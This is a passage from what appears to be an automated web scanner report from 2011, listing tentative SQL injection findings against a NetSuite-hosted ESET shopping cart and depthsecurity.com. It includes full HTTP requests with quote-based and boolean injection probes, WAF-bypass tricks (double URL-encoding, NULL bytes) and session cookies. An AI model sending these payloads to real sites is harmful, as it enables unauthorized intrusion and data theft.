POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode='&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:26 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2027412727:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49126


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=''&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:32 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -101878775:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54942


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.12. http://shopping.netsuite.com/s.nl [NLShopperId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The NLShopperId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLShopperId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS'; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:27:33 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121445976:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48758


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS''; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:27:36 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121446402:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54648


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.13. http://shopping.netsuite.com/s.nl [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2%2527; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:28:51 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233654826:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48755


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2%2527%2527; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:28:52 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233655032:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54649


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.14. http://shopping.netsuite.com/s.nl [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1'; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:30:40 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -804063199:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48736


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1''; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:30:43 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2027509818:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54627


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.15. http://shopping.netsuite.com/s.nl [promocode cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The promocode cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the promocode cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=%00'; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:14 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1248004410:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48959


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=%00''; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:16 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -804103430:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54845


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.16. https://www.depthsecurity.com/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.depthsecurity.com
Path:   /WebResource.axd

Issue detail

The d parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the d parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d1--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d2--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth Security - A Trusted Information Security Partner</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<link rel="SHORTCUT ICON" href="images/icon.jpg" />
<meta name="keywords" content="Information Security Partner, Information Security Advisor, Network Security, Web Application Security, Depth Security, Vendor Independent Security Services, Security Architecture and Design" />
<meta name="description" />
<meta name="robots" content="all" />
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
</head>
<body class="main">
<div id="page">

<div id="header-holder">
<div id="header">
<div class="logo"><a href="home.aspx"><img src="images/logo_221x53.gif" width="221" height="53" alt="DepthSecurity.com" title="DepthSecurity.com" /></a></div>

<div id="header-nav">
<div class="option"><div class="hot1"><a href="home.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option"><div class="link2"><a href="company.aspx"><img src="images/1px.gif" width="66" height="14" /></a></div></div>
<div class="option"><div class="link3"><a href="services.aspx"><img src="images/1px.gif" width="62" height="14" /></a></div></div>
<div class="option"><div class="link4"><a href="applicure-technologies-partnership.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option" style="border-right:none;"><div class="link5"><a href="contact-us.aspx"><img src="images/1px.gif" width="81" height="14" /></a></div></div>
<div class
...[SNIP]...
1.17. https://www.depthsecurity.com/WebResource.axd [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.depthsecurity.com
Path:   /WebResource.axd

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d1--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:50 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d2--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
